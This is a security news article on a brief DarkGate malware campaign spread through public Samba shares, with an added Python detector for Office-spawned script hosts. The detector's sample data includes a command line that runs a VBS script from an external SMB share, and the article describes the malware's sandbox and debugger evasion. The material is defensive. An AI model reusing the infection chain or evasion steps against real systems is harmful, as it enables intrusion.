Samba File Shares Used by Malware DarkGate in Transient Campaign


A brief campaign of DarkGate malware that attacked PCs by leveraging Samba file sharing as a vector has been discovered by cybersecurity researchers.

Palo Alto Networks Unit 42 reports that the activity took place in March and April of 2024 and relied on publicly accessible Samba file shares that hosted JavaScript and Visual Basic Script (VBS) files. The campaign targeted regions in Europe, North America, and parts of Asia. Security researchers Brad Duncan, Uday Pratap Singh, Anmol Maurya, Yijie Sui, and Vishwa Thothathri said, “This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware.” First observed in 2018, DarkGate has developed into a malware-as-a-service (MaaS) offering available to a limited customer base. It includes functions for code execution, cryptocurrency-related activity, and remote control of compromised hosts.

Since the QakBot infrastructure was taken down by international law enforcement in August 2023, attacks employing DarkGate have grown dramatically. The campaign observed by Unit 42 began with Microsoft Excel (.xlsx) files that, when opened, prompt recipients to click an embedded Open button. Doing so downloads and runs VBS code hosted on a Samba file share. The VBS script retrieves and executes a PowerShell script, which in turn downloads the AutoHotKey-based DarkGate package. Similar infection chains that downloaded and ran the follow-up PowerShell script were also observed, but these used JavaScript files rather than VBS.
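The infection chain described above (Excel lure, script host pulling a VBS or JS file from a remote SMB share, then PowerShell) leaves a recognizable parent-child process pattern. The following added detection example is not from the Unit 42 report or the article; it runs over constructed Sysmon-style process-creation events and flags Office-spawned script hosts, scripts loaded from SMB servers outside RFC 1918 space, and the Office -> script host -> PowerShell chain. The 203.0.113.10 address is a documentation-range placeholder, not a real indicator.

```python
import ipaddress
import re

# Constructed Sysmon-style process-creation events, not data from the Unit 42 report.
# pids 200-400 mirror the described chain: Excel -> wscript.exe running a VBS from an SMB share
# on a public (documentation-range) address -> powershell.exe. pids 500-600 are benign Excel use.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\EXCEL.EXE", "cmd": "EXCEL.EXE invoice.xlsx"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe", "cmd": r"wscript.exe \\203.0.113.10\share\update.vbs"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell.exe -w hidden -c <omitted>"},
    {"pid": 500, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\EXCEL.EXE", "cmd": "EXCEL.EXE budget.xlsx"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\splwow64.exe", "cmd": "splwow64.exe 12288"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# UNC path whose server part is an IPv4 literal, e.g. \\203.0.113.10\share\file.vbs
UNC_IP_RE = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\")
# RFC 1918 ranges; an SMB server outside them is treated as an external share.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def external_share(cmd):
    """Return the IPv4 literal of a non-RFC1918 SMB server referenced in cmd, or None."""
    m = UNC_IP_RE.search(cmd)
    if not m:
        return None
    addr = ipaddress.ip_address(m.group(1))
    return None if any(addr in net for net in INTERNAL_NETS) else str(addr)

def detect(events):
    """Flag Office -> script host (-> PowerShell) chains and scripts run from external shares."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        name, pname = basename(e["image"]), basename(parent["image"])
        if name in SCRIPT_HOSTS and pname in OFFICE_APPS:
            alerts.append((e["pid"], "office-app-spawned-script-host"))
            ip = external_share(e["cmd"])
            if ip:
                alerts.append((e["pid"], "script-from-external-smb-share:" + ip))
        if name == "powershell.exe" and pname in SCRIPT_HOSTS:
            grandparent = by_pid.get(parent["ppid"])
            if grandparent and basename(grandparent["image"]) in OFFICE_APPS:
                alerts.append((e["pid"], "office-script-host-powershell-chain"))
    return alerts
```

In production the same logic maps onto an EDR or SIEM query keyed on parent image, child image and a UNC path in the command line; the benign Excel session (pids 500 and 600) produces no alert.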

To avoid detection, DarkGate checks for various anti-malware applications and analyzes CPU statistics to determine whether it is running on a real host or in a virtual machine. It also monitors running processes for debuggers, virtualization software, and reverse-engineering tools. The researchers noted, “DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text,” adding that “DarkGate remains a potent reminder of the need for strong and proactive cybersecurity defenses as it continues to evolve and refine its methods of infiltration and resistance to analysis.”
